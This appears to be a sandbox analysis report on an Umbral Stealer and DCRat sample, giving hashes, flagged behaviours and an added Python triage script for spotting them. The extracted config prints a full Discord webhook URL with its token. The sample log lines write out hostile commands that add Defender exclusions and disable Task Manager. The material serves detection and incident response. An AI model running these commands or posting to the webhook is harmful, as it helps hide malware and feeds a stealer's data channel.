General

  • Target

    898a94f29edc228ce3bd2054f3d5d6dd.bin

  • Size

    3.6MB

  • Sample

    240505-bvm8bade58

  • MD5

    113d95e01eca6b087685fd31d893067d

  • SHA1

    5946a14101c4c6421dbba75ac436d46a48a90756

  • SHA256

    4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7

  • SHA512

    949f38260d74e1e10327cf225d8781ced706572ede98a32dfeee6bd12d32dd2c354f0d0ff24fae3ff6b02cf285afbba8456987735ef2e5af81fd54bd5bda0858

  • SSDEEP

    98304:+Yt7aeUqcE/zM0KJ3UCACEuvS67P1ZwtzKDIXp7Qnb:T7PUqlLVKJkvCEua6IoMXp7Qb

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1229451067175997500/jIKKpDize9BATyGRwJszp_dngrLcH2ykCNVKA2g8DaU3tS2rFJtimCYVQM10Zmvy_yF-

Targets

    • Target

      a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

    • Size

      4.3MB

    • MD5

      898a94f29edc228ce3bd2054f3d5d6dd

    • SHA1

      f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

    • SHA256

      a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

    • SHA512

      8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

    • SSDEEP

      49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

    • DcRat

      DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

    • Detect Umbral payload

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Umbral

      Umbral Stealer is an open-source modular stealer written in C#.

    • DCRat payload

      Detects the DCRat payload, which is commonly dropped by NSIS installers.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes so the dropped payload is not scanned.

    • Disables Task Manager via registry modification

    • Drops file in Drivers directory

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely to geofence execution.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials and other sensitive profile data.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.
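
The behaviours flagged above (Defender exclusions added through PowerShell, Task Manager disabled via the Policies\System registry key, an external-IP lookup, and a Discord webhook used as C2) can be triaged from process command lines and URL strings. The script below is an added example written for this page; it is not part of the sandbox report or of the Umbral or DCRat code. The regular expressions, the list of IP-lookup hosts, and the sample log lines are assumptions constructed for illustration. It also decodes the webhook's numeric ID, a Discord snowflake whose top 42 bits encode its creation time in milliseconds since 2015-01-01 UTC, which gives an approximate date the attacker set up the webhook without contacting Discord.

```python
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1_420_070_400_000  # Discord snowflake epoch: 2015-01-01T00:00:00Z

# Discord webhook URL: numeric snowflake ID followed by the webhook token.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([A-Za-z0-9_\-]+)"
)
# PowerShell Defender exclusions: Add-MpPreference -ExclusionPath|Extension|Process <value>
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b[^|;]*?-Exclusion(Path|Extension|Process)\s+['\"]?([^'\"\s;|]+)",
    re.IGNORECASE,
)
# Task Manager disabled via the Policies\System key (reg.exe /d 1 or Set-ItemProperty -Value 1).
TASKMGR_RE = re.compile(
    r"Policies\\System.*?DisableTaskMgr.*?(?:/d\s+|-Value\s+)0*1\b", re.IGNORECASE
)
# Assumed list of common external-IP lookup services; the report does not name the one used.
IP_LOOKUP_HOSTS = ("api.ipify.org", "ip-api.com", "ipinfo.io", "icanhazip.com")


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Recover the creation time embedded in a Discord snowflake (top 42 bits = ms since epoch)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def triage_line(line: str) -> list:
    """Return findings for one log line (a process command line or a URL string)."""
    findings = []
    for wid, token in WEBHOOK_RE.findall(line):
        findings.append({
            "kind": "discord_webhook_c2",
            "webhook_id": wid,
            "token_len": len(token),  # record only the length; never copy the token into reports
            "created": snowflake_to_datetime(int(wid)).isoformat(),
        })
    for scope, value in EXCLUSION_RE.findall(line):
        findings.append({"kind": "defender_exclusion", "scope": scope.lower(), "value": value})
    if TASKMGR_RE.search(line):
        findings.append({"kind": "taskmgr_disabled"})
    for host in IP_LOOKUP_HOSTS:
        if host in line.lower():
            findings.append({"kind": "external_ip_lookup", "host": host})
    return findings


def triage(lines) -> list:
    """Run triage_line over a sequence of lines, tagging each finding with its 1-based line number."""
    out = []
    for n, line in enumerate(lines, 1):
        for f in triage_line(line):
            out.append({"line": n, **f})
    return out


# Constructed sample log lines (not taken from the sandbox report); the webhook token is a placeholder.
SAMPLE_LOG = [
    r'powershell.exe -NoP -W Hidden -Command "Add-MpPreference -ExclusionPath C:\Users\Public\svc.exe"',
    r'powershell.exe -Command "Add-MpPreference -ExclusionExtension exe; Add-MpPreference -ExclusionProcess svc.exe"',
    r'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    "GET http://api.ipify.org/ HTTP/1.1",
    "POST https://discord.com/api/webhooks/1229451067175997500/TOKEN_REDACTED_xyz-123 HTTP/1.1",
    r"C:\Windows\explorer.exe",  # benign line, produces no finding
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The webhook ID from this report's config, 1229451067175997500, decodes to mid-April 2024, a few weeks before the sample date (240505), which is consistent with a webhook created for this campaign. The ID alone is enough to report the webhook to Discord; the token is the secret that lets anyone post to it, so keep it out of tickets and shared dashboards.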

MITRE ATT&CK Enterprise v15
